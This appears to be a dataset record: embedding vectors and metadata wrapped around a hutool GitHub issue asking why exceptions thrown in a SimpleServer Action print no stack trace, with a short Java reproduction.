-0.022402826696634293, 0.005713425111025572, -0.01586514711380005, -0.01301195565611124, -0.00008156689727911726, -0.04412934184074402, -0.004772929009050131, 0.014822498895227909, 0.014399804174900055, 0.007657821290194988, 0.009609262458980083, -0.012659710831940174, 0.007164677605032921, -0.01662599667906761, -0.01580878719687462, 0.0038324331399053335, 0.013681222684681416, -0.03829615190625191, -0.015217014588415623, -0.004311487544327974, -0.0033516178373247385, -0.0038394781295210123, -0.014808408915996552, 0.0056746783666312695, -0.00991219375282526, -0.007059003692120314, -0.023318665102124214, -0.0019391125533729792, 0.004522834904491901, -0.018669022247195244, 0.0053541348315775394, -0.01586514711380005, -0.010024912655353546, -0.018246326595544815, 0.007678956259042025, 0.01603422500193119, 0.0033886036835610867, 0.025446228682994843, 0.02816556580364704, -0.008982265368103981, -0.0017938112141564488, -0.001767392735928297, -0.025305330753326416, 0.017400937154889107, 0.009588127955794334, -0.01100415550172329, 0.021360179409384727, -0.0025713935028761625, 0.011990443803369999, -0.020486610010266304, -0.00618543429300189, -0.00349427736364305, 0.00762964179739356, 0.0016432261327281594, -0.019190344959497452, 0.026531146839261055, -0.008165054954588413, 0.01950032263994217, -0.011257772333920002, -0.009144298732280731, 0.011229593306779861, 0.029363201931118965, 0.009242926724255085, -0.022614173591136932, 0.01917625591158867, -0.014223681762814522, -0.01046874187886715, -0.02110656164586544, -0.0077071357518434525, -0.032350245863199234, 0.0012628008844330907, 0.03319563344120979, -0.01944396272301674, -0.0005578691489063203, -0.004184679128229618, 0.03023677133023739, 0.008925906382501125, -0.003938106819987297, -0.00852434616535902, 0.004237515851855278, 0.012864013202488422, -0.014089828357100487, -0.0030891948845237494, -0.002689395798370242, 0.0012504722690209746, 0.027813320979475975, -0.019782118499279022, -0.01490703783929348, -0.016146942973136902, 0.00575921731069684, -0.017541835084557533, -0.0009369735489599407, -0.0036598327569663525, 0.013793941587209702, -0.03869066759943962, 0.024755828082561493, 0.0026224693283438683, -0.011602973565459251, 0.0006732295732945204, 0.007305576000362635, 0.010377158410847187, -0.01940169371664524, -0.00517096696421504, 0.001568373991176486, 0.0056958128698170185, 0.0029940884560346603, 0.007798719685524702, -0.011053469963371754, -0.01178614143282175, 0.030800363048911095, -0.022740982472896576, 0.04691912606358528, 0.0307158250361681, -0.012737204320728779, 0.0014318787725642323, -0.025798475369811058, -0.025403959676623344, 0.022473275661468506, -0.008517300710082054, -0.022698713466525078, -0.0031032846309244633, -0.013948929496109486, 0.010229215025901794, 0.0032406605314463377, -0.004089572466909885, 0.010954841040074825, -0.012117251753807068, -0.01865493133664131, 0.00079343345714733, -0.04567922279238701, 0.001812304137274623, 0.0011949934996664524, 0.018739471212029457, 0.010039002634584904, -0.0015058503486216068, -0.012871057726442814, 0.017330488190054893, -0.006576427258551121, 0.012110207229852676, 0.0026594549417495728, -0.022825520485639572, 0.006217136513441801, 0.00472713727504015, -0.01726003922522068, -0.0011668138904497027, -0.005974086932837963, 0.0028901759069412947, -0.000026322109988541342, 0.03029312938451767, -0.007981887087225914, -0.02617890015244484, -0.016541458666324615, -0.010356023907661438, 0.012723114341497421, -0.02565757744014263, 0.0019250226905569434, -0.005174489226192236, -0.0004088251735083759, -0.001043527852743864, 0.0073337554931640625, 0.0034678590018302202, 0.0025132731534540653, -0.0059388624504208565, -0.0003040320589207113, 0.008489121682941914, -0.0033498567063361406, -0.0008555167587473989, 0.011828410439193249, -0.01469569094479084, -0.022839611396193504, 0.00585080124437809, 0.0014362818328663707, 0.005755694583058357, 0.020275263115763664, 0.02500944398343563, -0.02447403036057949, 0.039197903126478195, 0.02051478996872902, 0.0024938995484262705, -0.005512645002454519, 0.013984153978526592, -0.005414016544818878, 0.0032318541780114174, 0.010158766061067581, 0.0010840361937880516, -0.006410871632397175, -0.03840887174010277, -0.004713047295808792, -0.008700468577444553, -0.011574793606996536, 0.006291108205914497, -0.017753183841705322, -0.008890680968761444, 0.0063721248880028725, -0.012004533782601357, -0.0425231009721756, -0.003136747982352972, -0.008749783039093018, -0.014209591783583164, -0.02078249678015709, -0.0010135869961231947, -0.00531538762152195, 0.028179656714200974, -0.009285196661949158, -0.00037558196345344186, 0.008242549374699593, 0.012849923223257065, 0.012089072726666927, 0.031110340729355812, 0.009073848836123943, 0.012307465076446533, -0.004617941100150347, 0.008531390689313412, -0.009869924746453762, -0.024769917130470276, 0.0013526234542950988, -0.009954463690519333, 0.0104476073756814, -0.02608027122914791, -0.006639831233769655, -0.01218065619468689, -0.008855456486344337, 0.0005622722092084587, -0.024009067565202713, 0.010644865222275257, -0.002393509494140744, 0.013575549237430096, 0.009264062158763409, 0.014780229888856411, 0.014054602943360806, 0.009891059249639511, -0.0073337554931640625, 0.006509500555694103, 0.030152231454849243, -0.011102784425020218, -0.004646120592951775, -0.001121021923609078, 0.006985031999647617, 0.03280111774802208, 0.013476920314133167, 0.008024157024919987, 0.015456541441380978, -0.023755449801683426, 0.0018263940000906587, 0.018626753240823746, 0.016851434484124184, 0.01714732125401497, -0.0005521451239474118, 0.02462901920080185, -0.007869169116020203, 0.019049447029829025, -0.021811053156852722, 0.04508744925260544, -0.0017110335174947977, 0.015217014588415623, -0.007953708060085773, 0.01827450655400753, -0.008235504850745201, -0.017612284049391747, 0.012751294299960136, -0.03435099869966507, 0.02319185622036457, 0.002280790824443102, 0.025995733216404915, -0.010856212116777897, -0.005917727947235107, -0.005745127331465483, 0.008073471486568451, -0.01218065619468689, -0.010539190843701363, 0.01869720220565796, -0.0129837766289711, -0.005889547988772392, -0.022994598373770714, 0.00025713935610838234, 0.025502588599920273, 0.002803875831887126, 0.005192101467400789, -0.017781361937522888, 0.01896490901708603, 0.01517474465072155, -0.01950032263994217, 0.0012900999281555414, 0.00980652030557394, -0.006551770027726889, 0.015456541441380978, 0.0020007556304335594, 0.010722358711063862, 0.0014996860409155488, 0.016386469826102257, -0.00037690289900638163, 0.009581083431839943, 0.016795074567198753, 0.005974086932837963, -0.0007348725921474397, 0.003247705288231373, -0.012497677467763424, -0.01892263814806938, -0.00982765480875969, 0.009672666899859905, 0.007087183650583029, 0.01757001504302025, -0.016203302890062332, 0.017429117113351822, -0.026897480711340904, -0.01699233241379261, 0.02382589876651764, 0.006618696730583906, -0.0019813820254057646, 0.018091339617967606, 0.008143920451402664, -0.00575921731069684, 0.003270601388067007, -0.01544245146214962, 0.032350245863199234 ]
null
null
null
null
null
null
null
null
null
[ "dromara", "hutool" ]
### 版本情况 JDK版本: JDK 1.8 hutool版本: 5.8.26 ### 问题描述 我用`SimpleServer`来实现简单的HTTP请求处理,为什么Action中报错了没打印任何堆栈异常信息? 1. 复现代码 ```java public class DemoAction implements Action { private final Log log = Log.get(); @Override public void doAction(HttpServerRequest request, HttpServerResponse response) { int random = RandomUtil.randomInt(9); if (random % 2 == 0) { String msg = "Random number is even."; log.info(msg); response.write(msg); } else { String msg = "Random number is odd."; log.error(msg); throw new RuntimeException(msg); } } } ``` <img width="1061" alt="1714826763594" src="https://github.com/dromara/hutool/assets/18117854/45a010a8-2a50-40b3-8eec-95c227bf8cd5">
为什么 Action 报错不打印异常堆栈
https://api.github.com/repos/dromara/hutool/issues/3568/comments
8
2024-05-04T12:43:38
2024-05-06T08:09:53Z
https://github.com/dromara/hutool/issues/3568
2,278,976,665
3,568
false
This is a GitHub Issue repo:hutool owner:dromara Title : 为什么 Action 报错不打印异常堆栈 Issue date: --- start body --- ### 版本情况 JDK版本: JDK 1.8 hutool版本: 5.8.26 ### 问题描述 我用`SimpleServer`来实现简单的HTTP请求处理,为什么Action中报错了没打印任何堆栈异常信息? 1. 复现代码 ```java public class DemoAction implements Action { private final Log log = Log.get(); @Override public void doAction(HttpServerRequest request, HttpServerResponse response) { int random = RandomUtil.randomInt(9); if (random % 2 == 0) { String msg = "Random number is even."; log.info(msg); response.write(msg); } else { String msg = "Random number is odd."; log.error(msg); throw new RuntimeException(msg); } } } ``` <img width="1061" alt="1714826763594" src="https://github.com/dromara/hutool/assets/18117854/45a010a8-2a50-40b3-8eec-95c227bf8cd5"> --- end body ---
953
[ -0.008569195866584778, 0.002921487670391798, -0.006548938807100058, 0.02211017906665802, 0.0171984750777483, 0.02544472925364971, 0.008441521786153316, 0.034336868673563004, 0.013623595237731934, 0.02490399219095707, 0.00485537713393569, 0.044941339641809464, 0.0079007837921381, 0.0167178176343441, 0.04545203968882561, 0.0007913926965557039, -0.037761542946100235, 0.02071327157318592, -0.035808876156806946, -0.03418666124343872, -0.016101978719234467, 0.023011408746242523, -0.01867048442363739, 0.04542199894785881, -0.008276296779513359, 0.008681850507855415, -0.028118379414081573, 0.008561685681343079, -0.041967280209064484, -0.018279951065778732, -0.004814070649445057, -0.004262067377567291, 0.02648114413022995, 0.010334105230867863, 0.0334656797349453, 0.01800958253443241, 0.017033249139785767, 0.011032558977603912, -0.025970447808504105, 0.037130679935216904, 0.02490399219095707, -0.04226769134402275, -0.01635732688009739, 0.005891792010515928, -0.026796575635671616, 0.0033101430162787437, -0.022741040214896202, 0.005381094757467508, -0.039894454181194305, 0.02248569205403328, 0.015268339775502682, -0.00300785549916327, 0.011753542348742485, -0.014397150836884975, 0.0025985469110310078, -0.000767453748267144, 0.022245362401008606, -0.013728738762438297, -0.01616206020116806, -0.006766736041754484, 0.0022511978168040514, -0.019992288202047348, 0.015681404620409012, 0.004539946559816599, 0.004119372460991144, 0.017589008435606956, -0.0013349470682442188, 0.0353282205760479, 0.024363253265619278, 0.023942679166793823, -0.020382821559906006, 0.02153939940035343, 0.015118135139346123, 0.02192993275821209, 0.0077205379493534565, -0.016507530584931374, 0.02795315347611904, 0.02053302526473999, -0.026781555265188217, -0.016056915745139122, -0.029695531353354454, 0.014802704565227032, -0.04815572872757912, -0.0474047027528286, 0.002495280932635069, -0.016868023201823235, -0.024738766252994537, -0.057919055223464966, 0.0023356880992650986, 0.01859538070857525, 0.03304510563611984, -0.010649535804986954, -0.029289977625012398, 0.002091604983434081, -0.007442658767104149, 0.03752121329307556, -0.023837536573410034, -0.000321297935442999, -0.06657086312770844, 0.005884281359612942, 0.03298502042889595, -0.0018437665421515703, -0.03319530934095383, -0.0408557653427124, 0.01166341919451952, 0.0037964319344609976, -0.01626720279455185, 0.007626659702509642, 0.010101287625730038, 0.11697966605424881, 0.034697357565164566, 0.014990461058914661, -0.009936061687767506, -0.0641075000166893, -0.017814315855503082, 0.003835860639810562, 0.010153858922421932, 0.008621768094599247, -0.012369383126497269, 0.021944953128695488, -0.027262210845947266, 0.008501604199409485, -0.012782447040081024, -0.02748751826584339, -0.041756995022296906, 0.0032650816719979048, 0.024107905104756355, -0.011618358083069324, 0.014982950873672962, -0.024858931079506874, 0.009417854249477386, -0.015561239793896675, 0.008396460674703121, -0.004934235010296106, -0.00020700128516182303, -0.017228515818715096, -0.012527098879218102, 0.00317120342515409, -0.002957161283120513, -0.03301506116986275, -0.04169691354036331, -0.04491129890084267, -0.01571144536137581, -0.011993871070444584, -0.04563228413462639, 0.017018228769302368, 0.0004914520541206002, 0.011302927508950233, -0.027066944167017937, -0.0269317589700222, -0.04310883954167366, -0.025129299610853195, -0.0071084522642195225, 0.02769780531525612, -0.004021739587187767, -0.036559902131557465, -0.013946535997092724, 0.024934032931923866, -0.01384139247238636, -0.03020622953772545, 0.0005426156567409635, -0.01830999180674553, -0.00317120342515409, 0.013773799873888493, 0.011723501607775688, 0.0023826269898563623, 0.0044836197048425674, -0.022710999473929405, -0.05767872557044029, 0.02816344052553177, -0.029019609093666077, 0.005459952633827925, -0.0035542261321097612, 0.04307879880070686, -0.0660301223397255, 0.027427436783909798, 0.0037288395687937737, 0.01987212337553501, -0.005576361436396837, 0.007750579155981541, -0.006244773510843515, 0.041576750576496124, 0.014967930503189564, -0.02536962740123272, 0.036920394748449326, -0.036199409514665604, -0.017498884350061417, -0.038873057812452316, 0.0014560498530045152, -0.006946981884539127, -0.03658994287252426, -0.0167178176343441, 0.02053302526473999, -0.030041003599762917, 0.010934925638139248, -0.0058767711743712425, -0.015636341646313667, -0.05070921406149864, 0.010889863595366478, 0.016312265768647194, -0.047524869441986084, -0.02553485333919525, -0.04452076554298401, -0.021854830905795097, -0.01773921214044094, -0.006361182313412428, 0.010717128403484821, -0.016943126916885376, 0.00989851076155901, 0.010769699700176716, -0.019015954807400703, -0.0006158406031318009, 0.017018228769302368, -0.026135673746466637, -0.00984593853354454, 0.012316811829805374, 0.026120653375983238, 0.04404010996222496, -0.04289855435490608, -0.07275930792093277, 0.014847765676677227, -0.021689604967832565, -0.027382375672459602, 0.013736248947679996, -0.021704625338315964, 0.01351094152778387, 0.013300654478371143, -0.02944018319249153, 0.014209394343197346, -0.01468254067003727, -0.0023826269898563623, -0.02395769953727722, -0.012046442367136478, -0.0134733896702528, 0.029770635068416595, 0.011828645132482052, -0.01402914896607399, 0.009177526459097862, -0.006263549439609051, -0.004641334991902113, -0.008276296779513359, 0.06254536658525467, -0.012226688675582409, -0.04109609127044678, 0.012459506280720234, 0.005208359099924564, 0.026060570031404495, -0.014374620281159878, 0.012767426669597626, -0.022831162437796593, 0.01922624185681343, -0.04515162855386734, 0.005888036917895079, -0.01054439228028059, 0.029980922117829323, 0.04193723946809769, 0.024107905104756355, -0.02165956422686577, 0.03505785018205643, -0.0204278826713562, 0.016687776893377304, 0.03710063919425011, -0.02545975148677826, 0.0059180776588618755, 0.009447895921766758, -0.031272683292627335, -0.009312710724771023, 0.015951773151755333, -0.012797467410564423, 0.06170422211289406, 0.07131734490394592, -0.025579914450645447, -0.05425405129790306, 0.04980798438191414, 0.007840702310204506, -0.018910812214016914, 0.021389193832874298, 0.01366114616394043, 0.04449072480201721, -0.008952219039201736, -0.02814842015504837, -0.004348435439169407, 0.0417870357632637, -0.02499411441385746, -0.0048403567634522915, -0.0274124164134264, 0.026075590401887894, 0.015831608325242996, -0.03418666124343872, 0.022891243919730186, -0.03277473524212837, -0.030551699921488762, -0.037130679935216904, -0.013458369299769402, 0.021043723449110985, 0.023371901363134384, 0.00145792739931494, 0.020412862300872803, 0.0325043648481369, -0.0204278826713562, -0.003976678010076284, -0.02063816972076893, 0.04929728806018829, 0.018640441820025444, 0.006353672128170729, 0.0171834547072649, -0.0030116105917841196, 0.011408071033656597, 0.018520278856158257, -0.017799295485019684, 0.05167052522301674, 0.002223034156486392, -0.0076379249803721905, -0.019091058522462845, -0.0061321198008954525, 0.004404762294143438, 0.0195116326212883, 0.013165470212697983, -0.03803190961480141, -0.017994560301303864, -0.03169325739145279, 0.016597654670476913, -0.04626314714550972, 0.01969187706708908, 0.013368247076869011, 0.007345025427639484, -0.037130679935216904, 0.0033458168618381023, -0.04440060257911682, 0.017033249139785767, 0.03151301294565201, -0.006563959177583456, 0.011445621959865093, 0.005910567473620176, -0.01820484735071659, -0.04319896176457405, -0.006064527668058872, -0.03325539082288742, 0.012046442367136478, -0.014231925830245018, -0.03268461301922798, 0.01913611963391304, -0.018640441820025444, 0.005730321630835533, 0.008862095884978771, 0.002540342276915908, 0.015456096269190311, -0.018069664016366005, -0.004258312284946442, 0.021884871646761894, 0.000892781070433557, 0.007634169887751341, 0.005745342001318932, 0.005523789674043655, 0.005993180442601442, -0.0334356352686882, -0.031543053686618805, 0.017078310251235962, 0.004100596997886896, 0.023627249523997307, -0.0023882598616182804, -0.008989769965410233, -0.003633083775639534, 0.008298827335238457, 0.010762189514935017, -0.005512524396181107, 0.019166160374879837, -0.02191491238772869, -0.033225350081920624, -0.009425364434719086, -0.013075347058475018, 0.030401496216654778, 0.003392755752429366, 0.031242644414305687, -0.025339586660265923, 0.014509804546833038, -0.0483359731733799, -0.003178713610395789, -0.022695979103446007, 0.018820688128471375, 0.022605855017900467, -0.00510697066783905, -0.055876266211271286, 0.003308265469968319, 0.0014034780906513333, 0.017138391733169556, -0.01152823492884636, -0.017153413966298103, -0.009823407977819443, -0.021794747561216354, 0.020983640104532242, 0.012406934052705765, -0.055215366184711456, -0.02442333661019802, -0.023206675425171852, 0.012241709046065807, 0.007055880501866341, -0.009815897792577744, 0.03598912060260773, -0.06338651478290558, -0.0056026470847427845, 0.007224861532449722, 0.03770145773887634, -0.009395323693752289, -0.025204401463270187, 0.005381094757467508, 0.01933138631284237, 0.007476454600691795, 0.00517831789329648, 0.02843380905687809, -0.005238399840891361, -0.002024012617766857, -0.003811452304944396, -0.013180490583181381, -0.0029383855871856213, 0.010777209885418415, 0.04151666536927223, -0.005955629050731659, 0.0025947915855795145, -0.021584460511803627, -0.0005590443033725023, 0.008238744921982288, 0.014329559169709682, -0.00016393468831665814, -0.013676166534423828, 0.04337920993566513, 0.011302927508950233, 0.007990906946361065, 0.030536679551005363, -0.0557561032474041, -0.021043723449110985, -0.017889417707920074, 0.03220395743846893, 0.024934032931923866, -0.01007875707000494, 0.0007280249265022576, 0.0012373138451948762, -0.04001461714506149, -0.030025983229279518, 0.006725429557263851, -0.02072829194366932, 0.07564324885606766, -0.02156944014132023, -0.023927658796310425, -0.032294079661369324, -0.03076198697090149, -0.056537169963121414, -0.03652986139059067, -0.0010974353644996881, -0.010611984878778458, 0.006105834152549505, 0.035718753933906555, 0.01830999180674553, -0.013939025811851025, -0.0001638173416722566, -0.005801668856292963, -0.004547456745058298, 0.024768806993961334, 0.0283286664634943, -0.0025741385761648417, 0.006778001319617033, 0.03481752425432205, -0.019631795585155487, 0.02202005498111248, 0.017949499189853668, 0.012286770157516003, 0.027802949771285057, 0.010995007120072842, 0.019857103005051613, -0.010979986749589443, 0.002709323074668646, -0.02340194210410118, 0.02703690342605114, 0.005591381806880236, 0.01170848123729229, 0.005486238282173872, -0.03463727608323097, -0.031543053686618805, 0.03698047623038292, -0.009342752397060394, 0.005805423948913813, -0.028478872030973434, -0.005324767902493477, -0.0015227033291012049, 0.0032181425485759974, -0.014104250818490982, 0.05215118080377579, -0.0006839022389613092, -0.019091058522462845, 0.0005036562215536833, 0.004081821534782648, -0.01847521774470806, -0.03220395743846893, -0.014126782305538654, -0.011768562719225883, -0.040825724601745605, -0.04671376198530197, 0.014990461058914661, 0.03010108508169651, 0.03872285410761833, 0.008884626440703869, -0.013413308188319206, -0.007698007393628359, 0.000741167867090553, 0.016477489843964577, -0.00009329139720648527, -0.01166341919451952, 0.03782162442803383, -0.06260544806718826, -0.01865546405315399, 0.0016841737087816, -0.01319551095366478, -0.007299963850528002, -0.0390232652425766, -0.008749442175030708, -0.015666384249925613, -0.02879430167376995, 0.020668210461735725, 0.047344621270895004, 0.027096984907984734, -0.02200503461062908, 0.008238744921982288, -0.000256287312367931, 0.015531199052929878, 0.0008223725017160177, -0.013127918355166912, 0.03604920580983162, 0.025670036673545837, 0.007675476372241974, -0.03493768721818924, 0.008373930118978024, 0.0011302927741780877, 0.02024763636291027, 0.048185769468545914, -0.02703690342605114, 0.001816541887819767, -0.024964073672890663, 0.019181180745363235, 0.010837292298674583, -0.020457923412322998, 0.00808854028582573, 0.050859417766332626, 0.006421264726668596, 0.02705192379653454, -0.01170097105205059, 0.012241709046065807, -0.0352981798350811, 0.013165470212697983, 0.014292007312178612, 0.006263549439609051, 0.02200503461062908, 0.01885072886943817, 0.02024763636291027, 0.03604920580983162, -0.014892827719449997, 0.007923314347863197, -0.02386757731437683, 0.004675131291151047, 0.023762434720993042, 0.016312265768647194, -0.005966894328594208, 0.01287257019430399, 0.02488897182047367, -0.010844802483916283, 0.013172980397939682, -0.0027299763169139624, 0.00826127640902996, 0.03896318003535271, -0.011453133076429367, -0.0005275951116345823, 0.0004862887435592711, -0.010762189514935017, 0.003015365684404969, -0.012008891440927982, -0.009583080187439919, 0.026315920054912567, -0.005354809109121561, 0.005351053550839424, -0.009793367236852646, -0.015080584213137627, 0.034517113119363785, -0.018610401079058647, 0.018550319597125053, -0.006823062896728516, -0.005076929461210966, -0.012451996095478535, 0.011798604391515255, -0.021899892017245293, -0.020743312314152718, -0.0010289043420925736, 0.0056026470847427845, -0.02730727195739746, -0.03475744277238846, 0.016777900978922844, 0.0204429030418396, -0.03634961321949959, 0.0012542118784040213, 0.02425811067223549, 0.027066944167017937, 0.0029515286441892385, 0.04226769134402275, 0.027337312698364258, 0.016567613929510117, -0.03598912060260773, -0.019015954807400703, 0.04479113593697548, 0.022831162437796593, 0.011445621959865093, -0.004975541029125452, 0.01988714374601841, 0.02107376419007778, 0.022140219807624817, 0.02703690342605114, 0.009297690354287624, -0.014201884157955647, -0.027667764574289322, 0.023762434720993042, -0.0017742967465892434, 0.012602200731635094, 0.012940161861479282, 0.027247190475463867, -0.05836967006325722, 0.01997726783156395, -0.008952219039201736, -0.0030360189266502857, 0.017243536189198494, -0.01680794171988964, -0.02721714973449707, 0.008201193995773792, 0.0055613406002521515, -0.029575368389487267, -0.005403625313192606, -0.02332683838903904, -0.03259448707103729, -0.014795194379985332, 0.020578088238835335, 0.04001461714506149, -0.012572159990668297, 0.002249320037662983, -0.01821986958384514, 0.010784720070660114, -0.008749442175030708, 0.03029635176062584, 0.01662769541144371, -0.016868023201823235, 0.012557139620184898, 0.005249665584415197, 0.03187350556254387, 0.009598100557923317, 0.02352210506796837, -0.00193952233530581, -0.015621322207152843, 0.003511042334139347, 0.018910812214016914, -0.0017358066979795694, -0.03965412452816963, 0.03409653902053833, 0.02305646985769272, 0.0068944101221859455, -0.020578088238835335, -0.040735602378845215, -0.033315472304821014, 0.011310437694191933, -0.012617221102118492, -0.00022436874860432, -0.0048178257420659065, 0.008028457872569561, -0.023717371746897697, 0.026075590401887894, 0.024678684771060944, 0.022470669820904732, -0.001340579823590815, 0.004355945624411106, 0.00808103010058403, -0.017483863979578018, -0.0037401048466563225, 0.04292859509587288, -0.003161815693601966, -0.0018249909626320004, 0.006466325838118792, -0.024828890338540077, 0.01727357693016529, 0.01691308431327343, -0.005512524396181107, -0.03085211105644703, 0.0010608229786157608, 0.003005977952852845, 0.009770836681127548, 0.016312265768647194, -0.029064670205116272, -0.01287257019430399, -0.0009369038161821663, 0.026406042277812958, 0.011670930311083794, -0.011595827527344227, -0.017138391733169556, -0.0009998021414503455, -0.019076038151979446, -0.04884667322039604, -0.018355052918195724, -0.012256729416549206, 0.025700079277157784, -0.00923760887235403, 0.0010382921900600195, 0.0025929140392690897, 0.004149413667619228, 0.004449823871254921, -0.0066428170539438725, 0.014111761003732681, 0.005512524396181107, 0.011948809027671814, 0.017528925091028214, -0.017814315855503082, 0.007630414795130491, -0.006973267998546362, 0.0037044312339276075, 0.01931636594235897, -0.014382130466401577, -0.02573012001812458, -0.0010692719370126724, -0.04782527685165405, -0.013503431342542171, -0.025805221870541573, -0.026165714487433434, 0.01849023811519146, -0.0033458168618381023, 0.05088945850729942, 0.004660110455006361, 0.0113780302926898, 0.0019977267365902662, -0.03262453153729439, -0.014765153639018536, -0.019181180745363235, 0.00717979995533824, -0.047705113887786865, 0.006928206421434879, 0.031272683292627335, 0.01625218242406845, -0.02295132726430893, -0.002452096901834011, -0.007667966187000275, 0.005666484124958515, -0.007097186986356974, 0.017619049176573753, 0.00003177188045810908, -0.008096050471067429, -0.04665367677807808, 0.021614501252770424, -0.006500122137367725, 0.01495290920138359, 0.008524134755134583, 0.013112897984683514, -0.0102214515209198, -0.03379612788558006, -0.019481590017676353, 0.018790647387504578, 0.016792921349406242, 0.021314091980457306, -0.02203507535159588, 0.005538810044527054, -0.010747169144451618, 0.01865546405315399, -0.011167743243277073, 0.0007374127744697034, 0.0017320516053587198, 0.03214387223124504, 0.014156823046505451, -0.009034832008183002, 0.02089351788163185, 0.024934032931923866, -0.005610157269984484, -0.005324767902493477, -0.06897414475679398, 0.006864369381219149, 0.00039452288183383644, -0.019451549276709557, 0.01820484735071659, 0.0051107257604599, -0.04358949512243271, 0.027727846056222916, 0.0016212754417210817, -0.03773150220513344, -0.012399423867464066, 0.05704786628484726, 0.003571124281734228, 0.0014767030952498317, -0.027637723833322525, -0.010859822854399681, 0.01318800076842308, -0.008253765292465687, 0.017348678782582283, -0.011152722872793674, 0.03232412040233612, 0.006383713334798813, 0.005467462819069624, -0.032173916697502136, -0.0071084522642195225, -0.0090648727491498, -0.0029289978556334972, 0.0017940112156793475, 0.04620306193828583, 0.030446557328104973, -0.024768806993961334, 0.015253319405019283, -0.02212519943714142, 0.04337920993566513, 0.0032275302801281214, -0.031182561069726944, -0.011588317342102528, 0.04866642504930496, 0.007288698572665453, 0.0048403567634522915, -0.021809767931699753, 0.03076198697090149, 0.03857265040278435, 0.016101978719234467, -0.026421062648296356, -0.02452847920358181, 0.003067937446758151, 0.03038647584617138, 0.006004445720463991, 0.020112451165914536, -0.01091990526765585, -0.01745382323861122, 0.02452847920358181, -0.02452847920358181, -0.004224515985697508, 0.007626659702509642, 0.011625868268311024, -0.030086064711213112, 0.00872691161930561, -0.029214875772595406, -0.007348780520260334, -0.01698818802833557, -0.03328543156385422, -0.002052176045253873, -0.007224861532449722, -0.011618358083069324, -0.03205375000834465, 0.024318192154169083, -0.015320912003517151, -0.03085211105644703, -0.04193723946809769, 0.009673203341662884, 0.009094913490116596, 0.007705517578870058, -0.019812041893601418, -0.007168534677475691, 0.008201193995773792, -0.0013912739232182503, 0.0015001726569607854, 0.023552147671580315, -0.007089676801115274, 0.0250992588698864, 0.008418991230428219, 0.015245809219777584, 0.01728859730064869, -0.018174806609749794, 0.044280439615249634, -0.007288698572665453, 0.016747860237956047, -0.017393741756677628, -0.019736940041184425, -0.0063874684274196625, 0.02191491238772869, 0.00017297046724706888, -0.0113780302926898, -0.030912192538380623, 0.021013682708144188, -0.0005097583052702248, -0.00045155384577810764, -0.0029627939220517874, 0.025624975562095642, -0.02026265673339367, -0.020007308572530746, -0.0042282710783183575, 0.00854666531085968, 0.010056225582957268, -0.009725774638354778, -0.004723947960883379, -0.05909065529704094, 0.004772764630615711, -0.010904883965849876, -0.02072829194366932, 0.004325904417783022, -0.04220760986208916, 0.016056915745139122, -0.021299071609973907, -0.03400641679763794, 0.005253420677036047, 0.005358564201742411, 0.006571469362825155, -0.046413350850343704, -0.024032803252339363, 0.02182478830218315, -0.018325012177228928, 0.008997280150651932, -0.03658994287252426, -0.005489993374794722, 0.0022455649450421333, -0.00485162204131484, 0.00160249974578619, -0.008539155125617981, 0.013203021138906479, 0.010964966379106045, 0.02182478830218315, 0.0033401839900761843, 0.02352210506796837, 0.019947227090597153, 0.01791945844888687, 0.023762434720993042, 0.021163886412978172, -0.010138838551938534, -0.048816632479429245, -0.008696870878338814, -0.030341412872076035, -0.051039665937423706, 0.019256282597780228, 0.00413439329713583, 0.007491475436836481, -0.02999594248831272, -0.010987496934831142, -0.00045249261893332005, 0.017964519560337067, -0.004915459081530571, -0.0002553485392127186, -0.00003332673804834485, 0.025474771857261658, -0.02582024224102497, -0.021434256806969643, 0.01829497143626213, -0.01448727399110794, -0.013931515626609325, 0.009222588501870632, -0.018715545535087585, 0.021389193832874298, -0.03352576121687889, -0.0039466368034482, -0.03214387223124504, 0.015441075898706913, 0.03151301294565201, 0.02361222915351391, 0.007420127745717764, 0.0014250701060518622, -0.006357427220791578, 0.0315730944275856, -0.012076483108103275, 0.01272987574338913, -0.025399668142199516, 0.0009603733196854591, -0.034426990896463394, -0.0016776022966951132, -0.010138838551938534, -0.01569642499089241, -0.014787684194743633, -0.006999553646892309, -0.010927415452897549, 0.007420127745717764, -0.024964073672890663, 0.010176390409469604, 0.018925832584500313, 0.0012091504177078605, -0.011731011793017387, -0.01607193611562252, 0.004892928525805473, 0.024588560685515404, -0.0019301344873383641, -0.0012870692880824208, -0.02553485333919525, 0.010702107101678848, -0.011408071033656597, -0.04031502828001976, -0.024919012561440468, -0.008193683810532093, -0.03592903912067413, 0.032384201884269714, -0.019256282597780228, 0.017679130658507347, -0.046773843467235565, -0.019481590017676353, 0.03235416114330292, 0.014502294361591339, -0.0032613263465464115, -0.0008674339624121785, -0.01055190246552229, -0.0260004885494709, 0.03029635176062584, 0.05121991038322449, 0.0047577437944710255, 0.004325904417783022, 0.04932732880115509, 0.01970689930021763, -0.007645435631275177, -0.00717604486271739, 0.010642025619745255, 0.025985468178987503, -0.013435838744044304, -0.007491475436836481, -0.009966103360056877, -0.023912638425827026, -0.03193358704447746, -0.011806114576756954, 0.01924126222729683, 0.020187554880976677, 0.03466731682419777, 0.03370600566267967, -0.005283461418002844, 0.006207222584635019, 0.0014372742734849453, -0.026315920054912567, 0.010161369107663631, 0.0064287749119102955, -0.00210287026129663, -0.007037105038762093, -0.031062398105859756, 0.04401006922125816, -0.006560204084962606, -0.023747412487864494, 0.0018306236015632749, 0.04815572872757912, 0.003665002528578043, -0.006417509168386459, 0.013308164663612843, -0.02463362365961075, 0.024107905104756355, 0.009665693156421185, -0.03184346482157707, -0.010514351539313793, 0.012256729416549206, 0.00427333265542984, -0.00892217829823494, -0.004220760893076658, -0.012391913682222366, -0.02916981466114521, -0.005080684553831816, -0.020007308572530746, -0.015155686065554619, -0.021704625338315964, -0.021494338288903236, 0.046022817492485046, 0.028674138709902763, -0.010123818181455135, -0.03301506116986275, 0.013871433213353157, -0.01970689930021763, -0.008298827335238457, 0.0031374073587358, -0.0014213150134310126, 0.014397150836884975, -0.01924126222729683, -0.008186173625290394, -0.03235416114330292, 0.03680022805929184, 0.00873442180454731, -0.022245362401008606, 0.0009509855299256742, 0.013638615608215332, -0.029785655438899994, -0.00179494998883456, 0.00003464689871179871, -0.00873442180454731, -0.023266756907105446, 0.029034629464149475, -0.030596762895584106, -0.0064062438905239105, -0.017018228769302368, -0.00478402990847826, -0.02889944612979889, -0.023341860622167587, 0.01250456739217043, -0.0006571469712071121, -0.009132465347647667, -0.022140219807624817, -0.01221166830509901, -0.014810214750468731, -0.009680713526904583, -0.021494338288903236, 0.0077806198969483376, -0.030221249908208847, -0.014216904528439045, 0.0171984750777483, 